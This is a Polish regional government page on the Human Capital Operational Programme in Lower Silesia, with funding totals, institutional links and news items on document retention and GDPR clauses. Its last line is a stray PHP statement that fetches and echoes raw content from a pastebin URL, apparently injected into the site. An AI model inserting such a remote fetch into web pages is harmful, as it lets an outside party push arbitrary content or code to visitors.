Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

21.01.2021 Okres przechowywania dokumentacji związanej z realizacją Programu Operacyjnego Kapitał Ludzki

Na podstawie komunikatu Ministerstwa Funduszy i Polityki Regionalnej z dnia 31 grudnia 2020 roku, znak: DZF-V.737.38.2020.AL, informujemy, że zgodnie z art. 90 ust. 1a rozporządzenia (WE) nr 1083/2006 w dniu 20 listopada 2020...więcej ››

10.03.2020 Okres przechowywania dokumentacji związanej z realizacją Programu Operacyjnego Kapitał Ludzki

Zgodnie z art. 89 ust. 5 rozporządzenia (WE) nr 1083/2006 Instytucja Zarządzająca PO KL otrzymała pismo Komisji Europejskiej potwierdzające, że za datę zamknięcia Programu Operacyjnego Kapitał Ludzki (PO KL) należy uznać 20...więcej ››

16.11.2018 Klauzula informacyjna w zakresie przetwarzania danych osobowych w prowadzonym postępowaniu administracyjnym i/lub postępowaniu egzekucyjnym w administracji w ramach PO KL 2007-2013 w UMWD

Instytucja Pośrednicząca PO KL 2007-2013 (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem...więcej ››

31.10.2018 KLAUZULA INFORMACYJNA RODO DLA OSÓB, KTÓRYCH DANE ZAWARTE ZOSTAŁY WE WNIOSKACH O DOFINANSOWANIE, WE WNIOSKACH O PŁATNOŚĆ ZŁOŻONYCH W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI 2007-2013 ORAZ UMOWACH O DOFINANSOWANIE PROJEKTU W RAMACH PO KL (art.13)

Instytucja Pośrednicząca PO KL (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych...więcej ››

31.10.2018 KLAUZULA INFORMACYJNA RODO DLA OSÓB, KTÓRYCH DANE ZAWARTE ZOSTAŁY WE WNIOSKACH O DOFINANSOWANIE, WE WNIOSKACH O PŁATNOŚĆ ZŁOŻONYCH W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI 2007-2013 ORAZ UMOWACH O DOFINANSOWANIE PROJEKTU W RAMACH PO KL (art. 14)

Instytucja Pośrednicząca PO KL (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych...więcej ››

31.10.2018 KLAUZULA INFORMACYJNA RODO DLA OSÓB, KTÓRE KORZYSTAŁY Z USŁUG REGIONALNYCH OŚRODKÓW EFS W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI 2007-2013

Instytucja Pośrednicząca PO KL (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych...więcej ››

31.10.2018 KLAUZULA INFORMACYJNA RODO DLA OSÓB, KTÓRYCH DANE ZAWARTE ZOSTAŁY W INFORMACJACH (ZGŁOSZENIACH) DOTYCZĄCYCH SYTUACJI MOGĄCYCH STANOWIĆ NADUŻYCIE W PROCESIE REALIZACJI PO KL 2007-2013 (art.13)

Instytucja Pośrednicząca PO KL (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych...więcej ››

31.10.2018 KLAUZULA INFORMACYJNA RODO DLA OSÓB, KTÓRYCH DANE ZAWARTE ZOSTAŁY W INFORMACJACH (ZGŁOSZENIACH) DOTYCZĄCYCH SYTUACJI MOGĄCYCH STANOWIĆ NADUŻYCIE W PROCESIE REALIZACJI PO KL 2007-2013 (art. 14)

Instytucja Pośrednicząca PO KL (IP PO KL) uprzejmie informuje, że rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych...więcej ››

Wyświetla nowości od 1 do 8 ze wszystkich 337
<< Pierwsza < Poprzednia 1-8 9-16 17-24 25-32 33-40 41-48 49-56 Następna > Ostatnia >>
echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");